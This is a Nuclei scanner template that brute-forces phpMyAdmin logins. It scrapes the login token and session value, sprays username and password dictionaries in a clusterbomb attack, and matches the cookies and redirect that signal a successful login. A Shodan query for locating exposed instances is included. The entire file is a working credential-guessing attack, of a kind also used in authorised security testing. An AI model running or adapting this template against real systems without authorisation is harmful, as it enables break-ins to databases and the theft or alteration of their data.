id: phpmyadmin-brute

info:
  name: phpmyadmin-brute
  author: Natto97, gtrrnr
  severity: high
  description: phpMyAdmin contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.phpmyadmin.net
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    verified: true
    max-request: 2945
    shodan-query: http.title:phpMyAdmin
  tags: default-login,phpmyadmin

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - "pma_username"

  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: phpMyAdmin={{trim(session,"[]")}}; pma_lang=en

        set_session={{trim(session,"[]")}}&pma_username={{user}}&pma_password={{url_encode(password)}}&server=1&route=%2F&token={{trim(token,"[]")}}&lang=en

    attack: clusterbomb
    payloads:
      user: github/dictionary/phpmyadmin_login.txt
      password: github/dictionary/phpmyadmin_pass.txt
        
    extractors:
      - type: regex
        name: token
        internal: true
        group: 1
        part: body
        regex:
          - 'name="token" value="([a-z0-9]+)"'

      - type: regex
        name: session
        internal: true
        group: 1
        part: body
        regex:
          - 'name="set_session" value="([a-z0-9]+)"'
    req-condition: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_2, "phpMyAdmin=") && contains(header_2, "pmaUser-1=")
          - status_code_2 == 302
          - contains(header_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(header_2, '/index.php?route=/&route=%2F')
        condition: and
